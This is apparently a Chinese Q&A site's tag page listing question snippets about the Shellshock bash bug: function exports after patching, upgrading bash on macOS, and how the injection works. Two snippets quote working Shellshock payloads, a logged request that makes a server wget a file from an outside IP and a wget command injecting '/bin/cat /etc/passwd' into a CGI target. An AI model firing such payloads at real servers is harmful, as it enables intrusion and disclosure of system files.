shellshock-bash-bug

    0热度

    1回答

    什么是在shellshock更新后导出bash函数的正确方法?

    我目前遇到脚本问题,但我不确定正确的语法。我认为脚本被打破了shellshock补丁,但我只是想检查。 什么是从shellshock补丁后导出bash函数的正确方法。补丁之前的正确方法是什么? 以下是我正在寻找的几个例子。 A. export BASH_FUNC_module()='() { eval `/usr/bin/modulecmd bash $*`\0012}' 乙 export B
    bash redhat shellshock-bash-bug 2016-01-28

    1热度

    2回答

    Shellshock - 为什么允许注入环境变量?

    有两件事情我不明白对弹震漏洞: 为什么环境变量的注射允许未经验证的连接?这有什么好处? 什么实际的服务提供了注入变量的能力? 任何想法?
    bash shellshock-bash-bug 2014-09-27

    0热度

    4回答

    如何升级Mac OSX Snow Leopard中的Bash [并将其设置为正确的路径]?

    我想在我的Mac OS X Snow Leopard(10.6.8)中更新我的Bash(和Sh)程序,因为最近发生的错误 - Shellshock。我故意使用10.6.8,所以我现在不想更新到更新版本的OS X. 我已阅读过此Q & A - How do I upgrade Bash in Mac OSX Mountain Lion and set it the correct path?但它不适
    xcode bash homebrew osx-snow-leopard shellshock-bash-bug 2014-09-27

    0热度

    0回答

    如何防止Apache执行请求行作为bash命令?

    我在Apache 2.2.22上运行了几个虚拟主机,并且只注意到日志中一个相当惊人的事件:来自冰岛的“安全扫描器”能够通过以下http请求行将文件写入cgi-bin目录: () { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\" 它有效地下载了有问题的文件。 任何人都可以解释这个请求如何设法实际执行bash命令吗?
    apache bash security shellshock-bash-bug 2014-09-29

    1热度

    3回答

    Bash脚本不会ssh所有的csv文件的条目

    我想用最新的修复包修补一大堆CENT OS机器。我有下面的bash脚本,它将csv文件作为具有这些机器的ip地址和密码的输入。 但是,它的代码工作正常,它只适用于第一行,它似乎没有为列表的其余部分工作,因为我的output.txt只有第一行主机的条目。 patch.sh INPUT=hosts_test.cvs OLDIFS=$IFS IFS=, [ ! -f $INPUT ] && { e
    linux bash centos shellshock-bash-bug 2014-09-29

    0热度

    1回答

    Shellshock Bash bug的根本原因

    我没有得到shellshock的根本原因 bash错误,如CVE-2014-6271。 据我所知,如果应用程序数据包头中存在恶意代码,就会发生shellshock。例如,如果HTTP头包括http-header [Cookie] =(){:; }; ping 192.168.0.1然后ping到192.168.0.1。 但是,HTTP头只需要设置字符串变量。为什么Apache运行bash脚本? A
    bash shellshock-bash-bug 2014-09-29

    0热度

    1回答

    RoR:无法加载OpenSSL(在今天苹果的Bash修复之后)

    希望有人能够帮助解释这个错误并提醒我,或者在我今天运行苹果的bash shellshock修复程序后,试图通过rvm重新安装rails。 我升级到OSX 10.9.5 mav并运行Bash Shellshock,然后我的RoR应用程序需要重新安装轨道。当我尝试捆绑安装时,出现以下错误: 无法加载OpenSSL。 您必须使用OpenSSL支持重新编译Ruby,或将Gemfile中的来源从“https
    ruby-on-rails ruby macos bash shellshock-bash-bug 2014-09-30

    -2热度

    1回答

    如何恢复山狮的默认bash路径,我更新bash以避免shellshock,所以我不能启动

    我正在升级bash修补shellshock漏洞,所以我按照教程,我想我搞砸了,通过更换老斌/庆典$ PATH,所以我不能登录到我的MacBook ... 的教程说:如果你是很偏执,你可以卸下bash_old执行权限.... $ sudo chmod ax/bin/bash_old/bin/sh_old .... ------>可疑代码... 我认为这是一个很大的错误,所以我用旧的PATH替换为新的
    macos bash shell security shellshock-bash-bug 2014-10-01

    3热度

    2回答

    在环境中设置Bash函数

    我需要从C/C++程序在Bash环境中定义Bash函数。 setenv("my_func", "() { echo \"This is my function\";}", 1); 或者 putenv("my_func=() { echo \"This is my function\";}"); 但使用猛砸版:弹震错误之前,我可以这样定义一个函数: my_func='() { echo "T
    linux bash environment-variables setenv shellshock-bash-bug 2014-10-10

    2热度

    1回答

    无法利用所有文件的shellshock漏洞

    我一直在尝试利用我系统中的Shellshock漏洞,并遇到一个有趣的问题。我一直在使用'wget'来利用这个漏洞。我正在使用的命令如下: wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://somesite.com/some-script.cgi 使用上
    linux bash apache security shellshock-bash-bug 2015-11-15
最新问题